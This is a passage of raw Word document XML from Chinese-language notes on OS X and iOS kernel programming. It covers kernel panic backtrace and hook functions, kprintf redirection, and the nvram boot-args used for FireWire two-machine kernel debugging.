          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>         </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf_func</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...),</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lockFlag</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doUnslide</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B848E1" w:rsidRPr="0010480E" w:rsidRDefault="00B848E1" w:rsidP="003C4D4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRPr="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A3110">
        <w:t>panic_i386_backtrace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* Generate a backtrace, given a frame pointer - this routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * should walk the stack safely. The trace is appended to the panic log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * and conditionally, to the console. If the trace contains kernel module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * addresses, display the module name, load address and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3110" w:rsidRDefault="001A3110" w:rsidP="001A3110">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5493" w:rsidRDefault="000F5493" w:rsidP="000F5493">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> panic_hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">panic_hook_t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hook_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> panic_hook_fn_t hook_fn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5493" w:rsidRDefault="000F5493" w:rsidP="000F5493">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> panic_unhook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">panic_hook_t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hook_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4D4E" w:rsidRDefault="000F5493" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> panic_i386_backtrace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E41F8" w:rsidRDefault="000F5493" w:rsidP="006E41F8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006E41F8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>panic_check_hook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5493" w:rsidRPr="000F5493" w:rsidRDefault="000F5493" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C51F7" w:rsidRPr="003C51F7" w:rsidRDefault="003C51F7" w:rsidP="00AC2303">
      <w:pPr>
        <w:ind w:leftChars="50" w:left="220" w:hangingChars="50" w:hanging="110"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F3137" w:rsidRDefault="008F3137" w:rsidP="008F3137">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc445313318"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kprintf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="008F3137" w:rsidRPr="008F3137" w:rsidRDefault="008F3137" w:rsidP="008F3137">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核编程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F3137" w:rsidRDefault="008F3137" w:rsidP="008F3137">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kprintf  redirection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC2303" w:rsidRDefault="00887A5F" w:rsidP="008F3137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$ sudo nvram boot-args=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r w:rsidR="005E26BD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=0x8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5065" w:rsidRPr="002D5065" w:rsidRDefault="002D5065" w:rsidP="002D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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5065">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MacFlyic1010-3:Desktop root1$ fwkpfv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5065" w:rsidRDefault="002D5065" w:rsidP="002D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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5065">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Welcome to FireWireKPrintf. (viewer v2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77201" w:rsidRDefault="00D77201" w:rsidP="00D77201">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc445313319"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FireWire Debug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00D77201" w:rsidRDefault="009148FA" w:rsidP="00D77201">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irewire debug</w:t>
      </w:r>
      <w:r w:rsidR="00D77201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77201" w:rsidRDefault="00D77201" w:rsidP="002D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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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The default setting for two machine debugging is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>     sudo nvram boot-args="debug=0x146 kdp_match_name=firewire fwkdp=0x8000"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>     sudo reboot</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Non-built-in FireWire controllers are specifically excluded from working for both FireWireKDP and FireWireKPrintf. This is intentional. However there is an easy way to enable them.</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To enable non-built-in interfaces for FireWireKDP, add the "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fwkdp=0x8000</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" boot-arg. For FireWireKPrintf, use "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fwkpf=0x8000</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
